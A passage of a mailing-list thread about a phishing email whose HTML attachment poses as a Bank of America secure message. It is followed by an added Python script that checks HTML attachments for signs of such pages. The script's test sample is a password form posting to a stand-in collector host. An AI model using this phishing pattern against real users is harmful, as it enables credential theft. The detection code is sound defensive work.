Yes, unfortunately it is this easy.

On Dec 4, 2013, at 12:21 PM, Edmund Cramp <e...@motion-labs.com> wrote:

> A user received an email that purports to come from one of our customers with
> the instructions:
>
> "Click the securedoc.html attachment to open (view) the secure message. For
> best results, save the file first and open it from the saved location using a
> Web browser."
>
> My email system very sensibly stripped and quarantined the file, and stored
> it with a couple of hundred of assorted New Order.zip and payroll report.xls
> files in the quarantine directory. Opening the file with notepad shows it to
> be mostly javascript with various references that make it appear to come from
> the Bank of America.
>
> My immediate reaction was unprintable but hell, assuming that it's "real" and
> that's not certain yet, these people want me to let users open any HTML web
> page that floats into their inbox?
>
> This has got to be a gift from the gods if you are up to mischief - just
> email everyone a securedoc.html file and they will open it and enter their
> password ... which javascript (love that stuff) will promptly send to the web
> site of your choice.
>
> Spearfishing is this easy?
>
> Edmund Cramp - google.com/+edmundcramp
> --
> I am a drinker with writing problems. Brendan Behan
>
> _______________________________________________
> General mailing list
> General@brlug.net
> http://brlug.net/mailman/listinfo/general_brlug.net

---
Keith Stokes
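The quarantine decision described in this thread can be made explicit at the mail gateway. The following is an added example, not part of the original messages: a Python triage function that statically inspects an HTML attachment for scripts, password fields and remote form or script targets. The function names, the sample HTML and the host `collector.example.invalid` are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class AttachmentTriage(HTMLParser):
    """Collects the traits that matter for an HTML file arriving by mail."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = 0
        self.password_fields = 0
        self.remote_hosts = set()  # hosts that forms or external scripts point at

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self.scripts += 1
            self._note_remote(a.get("src", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            self._note_remote(a.get("action", ""))

    def _note_remote(self, url):
        host = urlparse(url.strip()).hostname  # None for relative or empty URLs
        if host:
            self.remote_hosts.add(host.lower())


def triage(html_text):
    """Return the findings and a quarantine verdict for one HTML attachment."""
    p = AttachmentTriage()
    p.feed(html_text)
    p.close()
    reasons = []
    # Script alone is enough: it can build the form at runtime, so a static
    # parse may never see the password field or the submission target.
    if p.scripts:
        reasons.append("script")
    if p.password_fields:
        reasons.append("password field")
    if p.remote_hosts:
        reasons.append("remote target")
    return {"reasons": reasons, "remote_hosts": sorted(p.remote_hosts),
            "quarantine": bool(reasons)}


# Constructed samples, not taken from the attachment discussed in the thread.
SAMPLE_SUSPECT = """<html><body><script>function go(){document.forms[0].submit();}</script>
<form action="https://collector.example.invalid/submit" method="post">
<input type="text" name="user"><input type="password" name="pw" />
</form></body></html>"""
SAMPLE_PLAIN = "<html><body><p>Meeting notes attached.</p></body></html>"

if __name__ == "__main__":
    print(triage(SAMPLE_SUSPECT))
    print(triage(SAMPLE_PLAIN))
```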